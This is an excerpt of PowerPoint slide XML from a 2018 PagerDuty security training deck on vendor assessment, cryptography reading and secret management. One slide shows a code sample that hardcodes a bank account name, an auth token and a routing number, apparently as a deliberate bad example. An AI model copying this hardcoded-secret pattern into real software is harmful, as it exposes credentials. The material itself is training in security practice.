              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1226" name="Cannot stress this enough. Assessing the vendor after they already have our data is not… ideal."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12179147" y="12661674"/>
            <a:ext cx="1088759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2000">
                <a:solidFill>
                  <a:srgbClr val="A6AAA9"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Cannot stress this enough. Assessing the vendor after they already have our data is not… ideal.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1227" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="14770305" y="11471306"/>
            <a:ext cx="721923" cy="1113696"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="BABCBB"/>
            </a:solidFill>
            <a:miter lim="400000"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200"/>
            </a:pP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1" name="Additional Reading"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>          Additional Reading</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1232" name="http://www.networksorcery.com/enp/data/encryption.htm…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="996553" y="4389304"/>
            <a:ext cx="22390894" cy="7469321"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:rPr u="sng">
                <a:hlinkClick r:id="rId3" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:rPr>
              <a:t>http://www.networksorcery.com/enp/data/encryption.htm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:rPr u="sng">
                <a:hlinkClick r:id="rId4" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:rPr>
              <a:t>https://www.owasp.org/index.php/Guide_to_Cryptography</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:rPr u="sng">
                <a:hlinkClick r:id="rId5" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:rPr>
              <a:t>https://gist.github.com/tqbf/be58d2d39690c3b366ad</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1233" name="Image" descr="Image"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph type="pic" idx="21"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:extLst/>
          </a:blip>
          <a:srcRect l="0" t="0" r="0" b="0"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="743302" y="12987118"/>
            <a:ext cx="1691863" cy="324838"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1234"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235" name="PUBLIC"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>PUBLIC</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1236" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1237" name="book (1).png" descr="book (1).png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="711200" y="946811"/>
            <a:ext cx="3036094" cy="3036095"/>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41" name="PagerDuty_logo_GREEN.png" descr="PagerDuty_logo_GREEN.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242"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243" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1244" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1245" name="Secret Management"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="869950" y="4536281"/>
            <a:ext cx="22644099" cy="464343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gn="l">
              <a:defRPr sz="11200">
                <a:solidFill>
                  <a:srgbClr val="353535"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Secret Management</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1246" name="Image" descr="Image"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="15201900" y="2697129"/>
            <a:ext cx="8321741" cy="8321742"/>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50" name="top-secret.jpg" descr="top-secret.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix amt="20000"/>
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-2710" y="-590979"/>
            <a:ext cx="24389420" cy="16083292"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1251" name="Managing, restricting, and auditing access to secrets."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Managing, restricting, and auditing access to secrets.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1252"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125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254" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1255" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1256" name="DEFINITION"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20250661" y="358292"/>
            <a:ext cx="3717418" cy="735952"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 13906"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3F7CAB"/>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DEFINITION</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="fast"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0" name="Secrets?"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Secrets?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1261" name="Tokens.…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="5800"/>
            </a:pPr>
            <a:r>
              <a:t>Tokens.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="5800"/>
            </a:pPr>
            <a:r>
              <a:t>API Keys.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="5800"/>
            </a:pPr>
            <a:r>
              <a:t>Passwords.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="5800"/>
            </a:pPr>
            <a:r>
              <a:t>Certificates.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="5800"/>
            </a:pPr>
            <a:r>
              <a:t>Encryption keys.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1262"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26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264" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1265"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fast"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3" name="ror_vulnerabilities.png" descr="ror_vulnerabilities.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst/>
          </a:blip>
          <a:srcRect l="0" t="0" r="0" b="0"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="374054" y="1105498"/>
            <a:ext cx="23635924" cy="17679059"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="286" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="336020" y="10956396"/>
            <a:ext cx="23711960" cy="2776538"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="23711958" cy="2776536"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="284" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="1506536"/>
              <a:ext cx="23711959"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353535"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="285" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="19579" y="0"/>
              <a:ext cx="23672801" cy="1558106"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:gradFill flip="none" rotWithShape="1">
              <a:gsLst>
                <a:gs pos="16513">
                  <a:srgbClr val="FFFFFF"/>
                </a:gs>
                <a:gs pos="72171">
                  <a:srgbClr val="FFFFFF">
                    <a:alpha val="50000"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="FFFFFF">
                    <a:alpha val="0"/>
                  </a:srgbClr>
                </a:gs>
              </a:gsLst>
              <a:path path="shape">
                <a:fillToRect l="50061" t="105303" r="49938" b="-5303"/>
              </a:path>
            </a:gradFill>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="50800" tIns="50800" rIns="50800" bIns="50800" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:defRPr sz="3200">
                  <a:solidFill>
                    <a:srgbClr val="353535"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="287" name="PagerDuty_logo_GREEN.png" descr="PagerDuty_logo_GREEN.png"/>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288"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289" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="290" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="291" name="https://www.cvedetails.com/vulnerability-list/vendor_id-12043/product_id-22568/Rubyonrails-Ruby-On-Rails.html"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="25"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:hlinkClick r:id="rId5" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr u="none"/>
            </a:pPr>
            <a:r>
              <a:rPr u="sng">
                <a:hlinkClick r:id="rId5" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:rPr>
              <a:t>https://www.cvedetails.com/vulnerability-list/vendor_id-12043/product_id-22568/Rubyonrails-Ruby-On-Rails.html</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="292" name="Image" descr="Image"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph type="pic" idx="26"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:extLst/>
          </a:blip>
          <a:srcRect l="0" t="0" r="0" b="0"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="fast"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9" name="ಠ_ಠ"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>ಠ_ಠ</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1270"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27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272" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1273" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1274" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13172" y="5166816"/>
            <a:ext cx="24357657" cy="4652368"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1275" name="bankConfig = {…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1369599" y="5453062"/>
            <a:ext cx="21568603" cy="4079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5200">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:satOff val="-3355"/>
                    <a:lumOff val="26614"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>bankConfig </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:satOff val="-3355"/>
                    <a:lumOff val="26614"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:satOff val="-3355"/>
                  <a:lumOff val="26614"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="5200">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:satOff val="-3355"/>
                    <a:lumOff val="26614"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:hueOff val="-2473792"/>
                    <a:satOff val="-50209"/>
                    <a:lumOff val="23543"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>accountName </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:satOff val="18648"/>
                    <a:lumOff val="5971"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>"pagerduty-bizniz-funds"</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:satOff val="18648"/>
                  <a:lumOff val="5971"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="5200">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:satOff val="18648"/>
                    <a:lumOff val="5971"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:hueOff val="-2473792"/>
                    <a:satOff val="-50209"/>
                    <a:lumOff val="23543"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>authToken </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:satOff val="18648"/>
                    <a:lumOff val="5971"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>"Bz1gtWJp1a4aybiPxFGGD6HxJ6wl0SjqhJ"</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:satOff val="18648"/>
                  <a:lumOff val="5971"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="5200">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:satOff val="18648"/>
                    <a:lumOff val="5971"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:hueOff val="-2473792"/>
                    <a:satOff val="-50209"/>
                    <a:lumOff val="23543"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>routingNumber </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:satOff val="18648"/>
                    <a:lumOff val="5971"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>"765555276"</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:satOff val="18648"/>
                  <a:lumOff val="5971"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="5200">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:satOff val="-3355"/>
                    <a:lumOff val="26614"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
